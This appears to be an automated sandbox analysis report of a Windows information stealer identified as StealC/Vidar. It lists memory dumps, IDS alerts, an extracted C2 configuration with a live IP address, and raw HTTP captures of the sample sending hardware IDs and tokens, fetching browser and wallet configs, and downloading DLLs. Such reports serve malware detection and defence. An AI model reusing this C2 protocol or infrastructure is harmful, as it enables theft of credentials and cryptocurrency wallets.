Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 0f0c66e934af2904ccadceb3b282f8f49e6479c84a67613ddb287db4b1b82cc4
Instruction ID: 58206e725234af8a59f2457114f5cfbc996f6c323e2015557a981f66d459c604
Opcode Fuzzy Hash: 0f0c66e934af2904ccadceb3b282f8f49e6479c84a67613ddb287db4b1b82cc4
Instruction Fuzzy Hash: 3AF03C79E44208BBDB14DBF0DC99F9E77B9BB48710F11C254B691AB2C0DBB0A6018F40

Function 0010C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0010C74E

Part of subcall function 0010BF9F: __amsg_exit.LIBCMT ref: 0010BFAF

__getptd.LIBCMT ref: 0010C765
__amsg_exit.LIBCMT ref: 0010C773
__updatetlocinfoEx_nolock.LIBCMT ref: 0010C797

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: d8f37a5e37837118f51912b35b0184fa5a194d7240793cef8210ed17932ca8d2
Instruction ID: 7b38c523df24ff9fb0d6ecd3ff46a0782a6cf96e5bac67e1e320fd3f8daffaf3
Opcode Fuzzy Hash: d8f37a5e37837118f51912b35b0184fa5a194d7240793cef8210ed17932ca8d2
Instruction Fuzzy Hash: 55F0BE329493019BD724BBB89887B8E33A06F20720F608249F4D5E72D2CFE459819ED6

Source: http://185.215.113.37/0d60be0de163924d/softokn3.dllE	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpog	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php~	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpick	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php_U	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php=r	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll)	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpCO	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpCoinomi	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpBs	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/z	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phps	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php_	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpi	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllP	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllW	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpin	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php5	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpFirefox	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php)	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.f0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.f0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_000F9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000FC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_000FC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_000F7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000F9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_000F9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00108EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00108EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJKJJDBKEGIECAAECFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 44 36 34 32 44 43 37 45 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 2d 2d 0d 0a Data Ascii: ------JKJKJJDBKEGIECAAECFHContent-Disposition: form-data; name="hwid"F9D642DC7E231817704571------JKJKJJDBKEGIECAAECFHContent-Disposition: form-data; name="build"save------JKJKJJDBKEGIECAAECFH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 2d 2d 0d 0a Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="message"browsers------IJEBKKEGDBFIIEBFHIEH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="message"plugins------BGHIIJDGHCBFIECBKEGH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="message"fplugins------EGHJKFHJJJKJJJJKEHCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFCHost: 185.215.113.37Content-Length: 6871Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFIHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIJECAEGDHIDHJKKKKFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 4a 45 43 41 45 47 44 48 49 44 48 4a 4b 4b 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIJECAEGDHIDHJKKKKFContent-Disposition: form-data; name="file"------IIIJECAEGDHIDHJKKKKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 2d 2d 0d 0a Data Ascii: ------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="file"------GDBFHDHJKKJDHJJJJKEG--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGIHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------DGHIDHCAAKECGCBFIJDBContent-Disposition: form-data; name="message"wallets------DGHIDHCAAKECGCBFIJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"ybncbhylepme------FIJKEHJJDAAKFHIDAKFH--
